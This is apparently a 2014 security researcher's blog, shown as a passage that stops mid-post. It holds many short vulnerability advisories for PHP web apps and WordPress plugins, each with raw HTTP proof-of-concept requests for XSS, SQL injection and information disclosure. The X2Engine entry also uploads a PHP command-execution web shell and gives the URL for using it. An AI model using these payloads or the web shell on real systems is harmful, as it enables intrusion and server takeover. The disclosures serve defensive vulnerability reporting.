Friday 28 February 2014

[EN] Mantis 1.2.16 SQL Injection - updated

As I wrote moment ago, there is an SQL injection vulnerability in latest MantisBT.

Currently, because of a fast and great work of Developer Team, it is fixed.

You can check the details here and in public section of this blog.

Once again, big thanks to Developers Team!
Great job! :)

[EN] SQL Injection in webERP

# ==============================================================
# Title ...| SQL Injection in webERP
# Version .| 4.11.3
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.weberp.org
# ==============================================================


# ==============================================================
# SQL Injection

---<request>---
POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 391

FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] SQL Injection in MantisBT 1.2.16

This post will be updated as soon as Vendor will release the patch ;)

[EN] Multiple vulnerabilities in doorGets 6.0

# ==============================================================
# Title ...|
Multiple vulnerabilities in doorGets 6.0
# Version .| doorGets 6.0
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================


# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/door/dg-admin/?controller=modulevideo&uri='`"%3b--#%%2f%2a HTTP/1.1
Host: 10.149.14.62(...)
Connection: close
---<request>---


---<response>---
Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90

Notice: Undefined variable: cResultsInt in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 90
video By Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 95
>10 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 96
>20 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 97
>50 Notice: Undefined variable: per in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 98
>100

Notice: Undefined variable: urlPageGo in /home/k/public_html/cms/door/cache/template/modules/bigadmin/modulevideo/bigadmin_modulevideo_index.tpl.php on line 103
---<response>---

# ==============================================================
# 2. Persistent XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=modulepage&uri=asdasd&lg=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 294

modulepage_edit_titre=asdasd&modulepage_edit_article_tinymce=</textarea><body onload=alert(123)>&modulepage_edit_meta_titre=asdasd&modulepage_edit_meta_description=asdasd&modulepage_edit_meta_keys=&modulepage_edit_partage=1&modulepage_edit_submit=Save
---<request>---

# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/door/dg-admin/?controller=configuration&action=siteweb HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 475

configuration_siteweb_statut=1&configuration_siteweb_statut_ip='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&configuration_siteweb_statut_tinymce=&configuration_siteweb_title=startowa&configuration_siteweb_slogan=startowa&configuration_siteweb_description=startowa&configuration_siteweb_copyright=startowa&configuration_siteweb_year=2014&configuration_siteweb_keywords=startowa&configuration_siteweb_id_facebook=&configuration_siteweb_id_disqus=&configuration_siteweb_submit=Save
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in OrangeHRM

# ==============================================================
# Title ...| XSS vulnerability in OrangeHRM
# Version .| OrangeHRM 3.1.1
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.orangehrm.com
# ==============================================================

[+] from admin user:

# ==============================================================
# XSS

---<request>---
POST /k/cms/orange/orangehrm-3.1.1/symfony/web/index.php/pim/viewEmployeeList HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 418

empsearch%5Bemployee_name%5D%5BempName%5D=asdasd&empsearch%5Bemployee_name%5D%5BempId%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a&pageNo=&hdnAction=search
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Thursday 27 February 2014

[EN] EPESI CRM vulnerable to persistent XSS

# ==============================================================
# Title ...| EPESI CRM vulnerable to persistent XSS
# Version .| epesi-1.5.5-20140113.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://epe.si/download
# ==============================================================


# ==============================================================
# Persistent XSS

---<request>---
POST /k/cms/epesi/epesi-1.5.5-20140113/process.php HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

history&url=_qf__libs_qf_de799fa0f329f8e35b5f4c3a4a059f5e%3D%26submited%3D1%26tab_name%3Da'%3e"%3e%3cbody%2fonload%3dalert(9999)%3eaaaa%26id%3D%26__action_module__%3D%252FBase_Box%257C0%252FBase_HomePage%257Cmain_0%252FBase_Dashboard%257C0
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] GroupOffice Multiple XSS

# ==============================================================
# Title ...| GroupOffice Multiple XSS
# Version .| groupoffice-com-5.0.44.tar.gz
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| https://www.group-office.com/
# ==============================================================


# ==============================================================
# 1. XSS


---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/portlet/portletGrid&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

sort='><body onload=alert(123)>&dir=ASC&groupBy=tasklist_name&groupDir=ASC&security_token=PRWJsDvCpVw4kElX2zBN
---<request>---



# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/task/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

task=task&tmp_files=&id=0&security_token=PRWJsDvCpVw4kElX2zBN&name=asdasd&link=<body onload=alert(123)>&start_time=27-02-2014&due_time=27-02-2014&status=NEEDS-ACTION&percentage_complete=0&tasklist_id=3&category_id=&priority=1&description=&interval=1&freq=&col_9=
---<request>---



# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=files/folder/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

parent_id=36&security_token=PRWJsDvCpVw4kElX2zBN&name=<body onload=alert(123)>
---<request>---




# ==============================================================
# 4. XSS

---<request>---
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=settings/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

tmp_files=&id=3&security_token=PRWJsDvCpVw4kElX2zBN&language=<body onload=alert(123)>&timezone=Asia%2FJakarta&dateformat=-%3AdmY&time_format=H%3Ai&first_weekday=1&holidayset=en&thousands_separator=%2C&decimal_separator=.&currency=%E2%82%AC&list_separator=%3B&text_separator=%22&theme=Group-Office&start_module=summary&max_rows_list=30&sort_name=last_name&mute_sound=0&mute_reminder_sound=0&mute_new_mail_sound=0&popup_reminders=0&mail_reminders=0&show_smilies=1&auto_punctuation=0&current_password=&password=&passwordConfirm=&first_name=Demo&middle_name=&last_name=User&title=&suffix=&initials=&sex=M&birthday=&department=&function=CEO&email=demo%40acmerpp.demo&email2=&email3=&home_phone=&fax=&cellular=06-12345678&work_phone=&work_fax=&address=1111%20Broadway&address_no=&zip=10019&city=New%20York&state=NY&country=US&use_html_markup=on&font_size=12px&comments_enable_read_more=0&reminder_value=&reminder_multiplier=60&background=EBF1E2&default_calendar_id=3&show_statuses=1&default_tasklist_id=3
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] PHP Ticket System SQL Injection

# ==============================================================
# Title ...| PHP Ticket System SQL Injection
# Version .| BETA_1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net/projects/phpticketsystem/
# ==============================================================


# ==============================================================
# SQL Injection

---<request>---
GET /k/cms/beta/mods/tickets/data/get_all_created_by_user.php?id='mynameissqli&sort%5B0%5D%5Bfield%5D=undefined&sort%5B0%5D%5Bdir%5D=desc HTTP/1.1
Host: 10.149.14.62
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/ 





* UPDATE *
I've just got a nice news from PacketStormSecurity 
that this vulnerability was already found by someone else. 

Thanks! ;) 

[EN] Multiple vulnerabilities in X2Engine

# ==============================================================
# Title ...| Multiple vulnerabilities in X2Engine
# Version .| X2Engine 3.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] For admin logged in

# ==============================================================
# 1. SQL Injection

---<request>---
GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1
Host: 10.149.14.62
(...)
Connection: close
---<request>---


Parameter "lastTimestamp" is also vulnerable.


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 917

Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create
---<request>---

Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D...


# ==============================================================
# 3. Arbitrary File Upload


---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---

To access shell, go to:
http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id



# ==============================================================
# 4. DOM-based XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');</script><script>alert(1)</script>&langCode=en HTTP/1.1
Host: 10.149.14.62
(...) <!-- yes, I know. This is the same request as [3] ;)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--

---<request>---



# ==============================================================
# 5. XSS

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/docs/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 260

Docs%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(991212129)%3e&Docs%5Bvisibility%5D=1&yt0=Create&Docs%5Btext%5D=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3Eaaaaaaaaaaaaaaaa%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A
---<request>---




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] VideoWhisper Video Conference XSS

# ==============================================================
# Title ...| VideoWhisper Video Conference XSS
# Version .|
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/cms/vc/vc_php/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 43

r='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Multiple vulnerabilities in PHP-CMDB

# ==============================================================
# Title ...| Multiple vulnerabilities in PHP-CMDB
# Version .| php-cmdb_0.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] From admin logged-in


# ==============================================================
# 1. XSS in SQL error

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 57

s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1
---<request>---


---<response>---
<td colspan='2' class='c_attr r_attr'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1</td>
</tr>
---<response>---

Same parameter seems to be vulnerable to SQL Injection attack.
("The used SELECT statements have a different number of columns")

# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 93

ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0
---<request>---



# ==============================================================
# 3. XSS /SQLi

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 100

s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0
---<request>---


# ==============================================================
# 4. XSS / SQLi

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 153

u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Multiple vulnerabilities in php-calendar 2.0.1

# ==============================================================
# Title ...| PHP Calendar Multiple vulnerabilities
# Version .| php-calendar-2.0.1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================

[+] As guest

# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/phpcalendar/php-calendar-2.0.1/index.php?action='`"%3b--#%%2f%2a&year=2014&month=1&day=28 HTTP/1.1
Host: 10.149.14.62
---<request>---

---<response>---
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(676): soft_error('Invalid action')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#3 {main}</pre>
---<response>---



# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

lasturl='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&action=login&submit=Log+in&username=admin&password=asd
---<request>---



# ==============================================================
# 3. Information disclosure bug

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 132

action=search&phpcid=1&searchstring=asdasd&search-from-date='`"%3b--#%%2f%2a&search-to-date=02%2F21%2F2014&sort=start_date&order=ASC

---<request>---


---<response>---
<div class="phpc-main"><h2>Error</h2>
<p>Malformed &quot;search-from&quot; date: &quot;\'`\&quot;;--#%/*&quot;</p>
<h3>Backtrace</h3>
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(843): soft_error('Malformed &quot;sear...')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(31): get_timestamp('search-from')
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(129): search_results()
#3 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680) : eval()'d code(1): search()
#4 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680): eval()
#5 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#6 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#7 {main}</pre>
---<response>---

# ==============================================================
# [+] From admin logged-in

# ==============================================================
# 4. Persistent XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 197

phpc_token=ALRTjtU1Qnv0LMm1G_BeiQSEUyGGHPYGrGMk8L6sfaI&action=user_create&submit_form=submit_form&submit=Submit&user_name='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&password1=aaaaa&password2=aaaaa
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Moodle 2.6.1 XSS

During last tests I found that latest version of Moodle is vulnerable to XSS.

Check it out:

# ==============================================================
# Title ...| Moodle 2.6.1 XSS
# Version .| (Feb 27  2014) moodle-latest-26.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://download.moodle.org
# ==============================================================

[+] From admin user:

# ==============================================================
# 1. Persistent XSS

---<request>---
POST /k/cms/moodle/course/edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 988

returnto=topcat&mform_isexpanded_id_descriptionhdr=1&addcourseformatoptionshere=&enablecompletion=0&id=&sesskey=TCxmENhHwt&_qf__course_edit_form=1&mform_isexpanded_id_general=1&mform_isexpanded_id_courseformathdr=0&mform_isexpanded_id_appearancehdr=0&mform_isexpanded_id_filehdr=0&mform_isexpanded_id_enrol_guest_header_0=0&mform_isexpanded_id_groups=0&mform_isexpanded_id_rolerenaming=0&fullname=startowy&shortname=startowy&category=1&visible=1&startdate%5Bday%5D=28&startdate%5Bmonth%5D=2&startdate%5Byear%5D=2014&idnumber=&summary_editor%5Btext%5D=%3Cp%3Estartowy%3C%2Fp%3E&summary_editor%5Bformat%5D=1&summary_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&overviewfiles_filemanager=41075595&format=weeks&numsections=10&hiddensections=0&coursedisplay=0&lang=&newsitems=5&showgrades=1&showreports=0&maxbytes=0&enrol_guest_status_0=1&groupmode=0&groupmodeforce=0&defaultgroupingid=0&role_1=&role_2=&role_3=&role_4=&role_5=&role_6=&role_7=&role_8=&submitbutton=Save+changes
---<request>---


# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/moodle/group/group.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 361

id=&courseid=5&sesskey=cik7wECmff&_qf__group_form=1&mform_isexpanded_id_general=1&name=aaaaaaaaaaaaaa&idnumber=&description_editor%5Btext%5D=%3Cp%3Eaaaaaaaaaaaaaaaaaaaaaaa%3C%2Fp%3E&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&enrolmentkey=&hidepicture=0&imagefile=801633198&submitbutton=Save+changes
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Wednesday 26 February 2014

[EN] Multiple XSS in mp3-jplayer

# ==============================================================
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# Multiple XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441

mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---

Also vulnerable:
mp3foxScreenOpac, mp3foxScreenColour, mp3foxLoadbarOpac, mp3foxLoadbarColour, mp3foxPosbarOpac, mp3foxPosbarColour,
mp3foxPlaylistOpac, mp3foxPlaylistColour, mp3foxScreenTextColour, mp3foxListTextColour, mp3foxListCurrentColour, mp3foxListBGaCurrent, mp3foxListBGaCurrent, mp3foxListHoverColour, mp3foxListBGaHover, mp3foxPopoutBackground,
mp3foxPopoutBGimage, mp3foxPlayerWidth, mp3foxPlayerWidth, loggedout_dload_text, loggedout_dload_link, dload_text,
dloader_remote_path, mp3foxPaddings_top, mp3foxPaddings_inner, mp3foxPaddings_bottom,  file_separator, caption_separator, mp3foxPopoutButtonText, make_player_from_link_shcode, MtogBox1


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in PrintFriendly

# ==============================================================
# Title ...| XSS in PrintFriendly
# Version .| printfriendly 3.3.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1389

option_page=printfriendly_option&action=update&_wpnonce=496ce7c4d4&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dprintfriendly&printfriendly_option%5Bbutton_type%5D=pf-button.gif&printfriendly_option%5Bcustom_image%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&printfriendly_option%5Bcustom_text%5D=Print+Friendly&printfriendly_option%5Btext_color%5D=%236D9F00&printfriendly_option%5Btext_size%5D=14&printfriendly_option%5Bcontent_position%5D=left&printfriendly_option%5Bcontent_placement%5D=after&printfriendly_option%5Bmargin_left%5D=12&printfriendly_option%5Bmargin_right%5D=12&printfriendly_option%5Bmargin_top%5D=12&printfriendly_option%5Bmargin_bottom%5D=12&printfriendly_option%5Bshow_on_posts%5D=on&printfriendly_option%5Bshow_on_pages%5D=on&printfriendly_option%5Blogo%5D=favicon&printfriendly_option%5Bimage_url%5D=&printfriendly_option%5Btagline%5D=&printfriendly_option%5Bclick_to_delete%5D=0&printfriendly_option%5Bhide-images%5D=0&printfriendly_option%5Bimage-style%5D=right&printfriendly_option%5Bemail%5D=0&printfriendly_option%5Bpdf%5D=0&printfriendly_option%5Bprint%5D=0&printfriendly_option%5Bcustom_css_url%5D=&printfriendly_option%5Bwebsite_protocol%5D=http&printfriendly_option%5Bpassword_protected%5D=no&printfriendly_option%5Bjavascript%5D%3E=yes&printfriendly_option%5Benable_google_analytics%5D=no&printfriendly_option%5Bpf_algo%5D=wp
---<request>---

Also vulnerable: printfriendly_option%5Bcustom_text%5D



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in Alpine PhotoTile for Instagram

# ==============================================================
# Title ...| XSS in Alpine PhotoTile for Instagram
# Version .| Alpine PhotoTile for Instagram 1.2.6.5
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=plugin-settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 300

hidden=Y&general_highlight_color=%2364a2d8&general_lightbox=alpine-fancybox&general_lightbox_params='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&general_block_users=&hidden_widget_alignment=1&cache_time=4&alpine-photo-tile-for-instagram-settings_plugin-settings%5Bsubmit-plugin-settings%5D=Save+Settings
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in Widget Control Powered By Everyblock

# ==============================================================
# Title ...| XSS in Widget Control Powered By Everyblock
# Version .| widget-control-powered-by-everyblock.1.0.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/admin.php?page=add-widget-slug HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 52

idDropdown='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---  

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in BSK PDF Manager

# ==============================================================
# Title ...| XSS in BSK PDF Manager
# Version .| bsk-pdf-manager 1.3
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/admin.php?page=bsk-pdf-manager&view=addnew HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 302

page=bsk-pdf-manager&view='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&cat_title=asdasd&bsk_pdf_manager_action=category_save&bsk_pdf_manager_category_id=-1&bsk_pdf_manager_category_save_oper_nonce=9977a95481&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dbsk-pdf-manager%26view%3Daddnew
---<request>---

Also vulnerable is 'category->title'.

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in VideoWhisper Live Streaming

# ==============================================================
# Title ...| XSS in VideoWhisper Live Streaming
# Version .| 4.29.6
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=premium HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 310

